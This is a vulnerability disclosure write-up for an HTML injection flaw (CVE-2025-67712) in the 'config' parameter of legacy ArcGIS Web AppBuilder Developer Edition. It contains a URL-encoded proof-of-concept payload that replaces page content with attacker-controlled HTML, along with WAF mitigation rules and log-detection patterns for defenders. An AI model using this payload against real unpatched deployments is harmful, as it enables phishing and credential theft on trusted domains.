Skip to main content

CVE-2025-67712 - Technical Analysis, Proof of Concept (PoC) and Mitigation

CVE-2025-67712

Executive Summary:

Product: Esri ArcGIS Web AppBuilder (Developer Edition)
Affected Versions: All versions prior to 2.30
Vulnerability Type: HTML Injection (Unauthenticated)
Severity: Medium
Status: Retired / Unsupported (EOL)

At least one public-facing deployment remained vulnerable at the time of disclosure.

Note: Since this software version has received "unsupported-when-assigned" (EOL) status, users on versions earlier than 2.30 will not receive an official patch. This write-up aims to document the vulnerability to help administrators still relying on legacy environments to implement proper mitigations.

Description:

I have discovered a HTML Injection vulnerability in the Developer Edition of ArcGIS Web AppBuilder. A remote, unauthenticated attacker can craft a malicious URL that, when clicked by a victim, causes arbitrary HTML content to be rendered in the victim's browser within the context of the trusted application domain. While the lack of JavaScript execution (XSS) limits the immediate impact, this flaw facilitates high-quality phishing and defacement attacks. 

The "config" parameter (i.e.: ?config=map_configuration.json) fails to sanitize HTML tags before injecting them into the Document Object Model (DOM). 

ArcGIS Web AppBuilder Developer Edition is a widely used tool for creating custom GIS applications. Since this specific edition has reached End-of-Life (EOL) status, users on versions earlier than 2.30 will not receive an official patch. This write-up aims to document the vulnerability to help administrators still relying on legacy environments to implement proper mitigations.


 

The vulnerable 'config' parameter, as seen in the Esri code (see ConfigLoader.js)

Steps to Reproduce:

1. Identify your application instance that is using ArcGIS Web AppBuilder Developer Edition (< 2.30).
2. Craft an URL with a custom HTML payload in the vulnerable parameter (the "config" parameter).
3. When the crafted URL is clicked, the HTML code injected in the 'config' parameter get's rendered by the browser.

As a result of this, a vulnerable instance can be used for phishing or social engineering attacks. 

Proof-of-Concept (PoC) code samples:
A) A simple HTML injection payload that will inject HTML and overwrite existing page content:


config=%3Cstyle%3Ehtml%2Chtml%20*%7Bdisplay%3Anone%21important%3Bvisibility%3Ahidden%21important%3B%7D%3C%2Fstyle%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bposition%3Afixed%21important%3Btop%3A0%21important%3Bleft%3A0%21important%3Bwidth%3A100vw%21important%3Bheight%3A100vh%21important%3Bbackground%3A%23f5f5f5%21important%3Bz-index%3A2147483647%21important%3Boverflow%3Aauto%21important%3Bmargin%3A0%21important%3Bpadding%3A0%21important%3B%27%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bmax-width%3A800px%3Bmargin%3A50px%20auto%3Bpadding%3A20px%3B%27%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bbackground%3Awhite%3Bpadding%3A30px%3Bborder-radius%3A8px%3Bbox-shadow%3A0%202px%2010px%20rgba(0%2C0%2C0%2C0.1)%3B%27%3E%3Ch1%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bcolor%3Ared%3B%27%3EINJECTED%20HEADING%3C%2Fh1%3E%3Cp%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bcolor%3A%23666%3Bmargin%3A20px%200%3B%27%3EThis%20demonstrates%20complete%20page%20takeover.%20ALL%20original%20website%20content%20is%20now%20completely%20hidden%20and%20replaced%20with%20attacker-controlled%20content.%3C%2Fp%3E%3Cdiv%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bbackground%3A%23fff3cd%3Bborder-left%3A4px%20solid%20%23ffc107%3Bpadding%3A15px%3Bmargin%3A20px%200%3B%27%3E%3Cstrong%20style%3D%27display%3Ainline%21important%3Bvisibility%3Avisible%21important%3B%27%3E%E2%9A%A0%EF%B8%8F%20Critical%20Security%20Issue%3C%2Fstrong%3E%3Cbr%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3B%27%3E%3Cspan%20style%3D%27display%3Ainline%21important%3Bvisibility%3Avisible%21important%3B%27%3EAn%20attacker%20has%20full%20control%20over%20what%20users%20see.%20They%20could%20display%20any%20content%2C%20including%20phishing%20forms%2C%20malicious%20links%2C%20or%20fake%20system%20messages.%3C%2Fspan%3E%3C%2Fdiv%3E%3Ch2%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3B%27%3EWhat%20an%20attacker%20could%20do%3A%3C%2Fh2%3E%3Cul%20style%3D%27display%3Ablock%21important%3Bvisibility%3Avisible%21important%3Bline-height%3A1.8%3B%27%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EDisplay%20convincing%20phishing%20forms%20that%20look%20legitimate%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EShow%20fake%20security%20warnings%20to%20trick%20users%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EReplace%20your%20entire%20website%20with%20malicious%20content%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EHarvest%20credentials%20while%20appearing%20to%20be%20your%20site%3C%2Fli%3E%3Cli%20style%3D%27display%3Alist-item%21important%3Bvisibility%3Avisible%21important%3B%27%3EDistribute%20malware%20or%20redirect%20to%20malicious%20sites%3C%2Fli%3E%3C%2Ful%3E%3C%2Fdiv%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

The effect of rendering the HTML on the affected version of Web App Builder. 

Mitigation:

As noted in the official CVE description, there is no evidence of JavaScript execution, which prevents classic Cross-Site Scripting (XSS) attacks like cookie theft. However, the impact remains.
Attackers can inject <iframe> or <form> tags to mimic login prompts and steal credentials. Users are more likely to trust the malicious content because the browser's address bar shows a legitimate, trusted domain. 

Since the product is retired and unsupported, the following steps are recommended, based on official ESRI recommendation "Customers are encouraged to migrate from ArcGIS Web AppBuilder at their earliest convenience to ArcGIS Experience Builder, the recommended migration path" [1]

If migration to a newer version if not possible for you, identify all configurations that you have (e.g.: config1.json, config2.json, config3.json etc) and make sure they're the only ones allowed on WAF. Anything that has something such as "?config=%3Cstyle%3E" in the request should be blocked. 

Use the following Nginx / Apache+ModSecurity rules for a simple hot-fix.  

server-config.conf
# Apache + ModSecurity mitigation:
SecRule ARGS:config "!^(config\.json|config1\.json)$" \
"id:100001,phase:2,deny,status:403,msg:'Invalid config parameter'"

# Nginx:
if ($arg_config != "") {
if ($arg_config !~ ^(config\.json|config1\.json)$) {
return 403;
}
}

Monitoring and Detection

To identify potential exploitation attempts, administrators should inspect web server access logs and WAF telemetry for requests containing the config parameter paired with HTML-specific characters or tags.

Generic Indicators of Compromise (IoC):

  • Unexpected GET requests with config= parameter.
  • URL-encoded characters: %3C (<), %3E (>), %22 ("), %27 (').
  • Inclusion of unusual strings such as script, alert, or onerror within the parameter value.

Sample Log Analysis Command (Linux/Unix):

grep -E "config=.*(%3C|%3E|%22|%27|<|>|script)" /var/log/access.log

Disclosure Timeline

2025-11-29 Vulnerability discovered and reported.
2025-12-05 Vulnerability validated; CVE-2025-67712 assigned.
2025-12-19 CVE published by ESRI CNA.
2026-01-07 Technical write-up published.

Thanks to ESRI/ArcGis and CERT.PL for quick, professional responses and communication.  

🔗 References & Additional Resources

Note: Always verify mitigation rules in a staging environment before deploying to production.

Labels:

Comments

New comments are not allowed.